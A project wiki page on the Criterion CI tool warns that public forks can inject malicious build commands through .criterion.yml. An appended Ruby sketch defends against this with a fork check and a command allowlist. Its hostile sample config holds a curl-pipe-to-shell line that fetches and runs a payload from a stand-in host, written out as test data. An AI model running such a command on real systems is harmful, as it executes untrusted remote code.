Recommendations
Scott Robertson edited this page Jul 27, 2013
We recommend using Criterion only for private repositories. Criterion offers great simplicity and flexibility, but if it is left publicly accessible it can open your servers up to malicious abuse.
E.g.
- Your public repo is forked
- Malicious code is entered into the .criterion.yml file
- A pull request is then sent
- This malicious code would then be run by your server, and could contain any number of terrors!
An obvious decision has been made to trade open-source security against functionality. There are definite ways we could limit commands or force them through wrappers, but this in turn would limit the application's abilities.
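The two mitigations the paragraph alludes to, refusing builds triggered from forks and forcing build steps through a command allowlist, can be sketched as a pre-build review. The example below is added here and is not Criterion's own code; the `.criterion.yml` keys (`before_script`, `script`), the allowlist contents, the sample configs and the repository names are all constructed assumptions for illustration.

```ruby
require 'yaml'
require 'shellwords'

# Constructed sample configs. The key names "before_script" and "script" are an
# assumption for illustration, not Criterion's documented format.
SAFE_CONFIG = <<~YAML
  before_script:
    - bundle install --deployment
  script:
    - bundle exec rake test
YAML

HOSTILE_CONFIG = <<~YAML
  script:
    - curl http://example.invalid/payload.sh | sh
    - bundle exec rake test
YAML

# Commands a build step may invoke; the first token of every step must be here.
# (Assumed allowlist for a typical Ruby project.)
ALLOWED_COMMANDS = %w[bundle rake rspec].freeze

# Shell metacharacters that would let a step chain, pipe or redirect beyond the
# allowlisted binary, defeating the allowlist.
SHELL_META = /[|;&`$<>()]/

# Reviews a proposed build before anything runs.
# Returns [:ok, []] when the build may proceed, or [:reject, reasons] otherwise.
def review_build(config_yaml:, head_repo:, base_repo:)
  reasons = []

  # A pull request whose head lives in another repository is a fork: its
  # .criterion.yml is attacker-controlled, so do not run it at all.
  if head_repo != base_repo
    reasons << "pull request comes from a fork (#{head_repo}), not #{base_repo}"
  end

  config = YAML.safe_load(config_yaml) || {}
  %w[before_script script].each do |phase|
    Array(config[phase]).each do |step|
      if SHELL_META.match?(step)
        reasons << "#{phase}: step #{step.inspect} contains shell metacharacters"
        next
      end
      # Split like a shell would, then check only the program being invoked.
      cmd = Shellwords.split(step).first
      unless ALLOWED_COMMANDS.include?(cmd)
        reasons << "#{phase}: command #{cmd.inspect} is not allowlisted"
      end
    end
  end

  reasons.empty? ? [:ok, []] : [:reject, reasons]
end

if $PROGRAM_NAME == __FILE__
  p review_build(config_yaml: SAFE_CONFIG, head_repo: 'org/app', base_repo: 'org/app')
  p review_build(config_yaml: HOSTILE_CONFIG, head_repo: 'attacker/app', base_repo: 'org/app')
end
```

The fork check is the cheap, decisive control: it removes the pull-request vector entirely for a public repository. The allowlist is the "wrapper" trade-off the page describes; it stops arbitrary commands but also blocks any legitimate step that is not on the list, which is exactly the loss of flexibility the author is weighing.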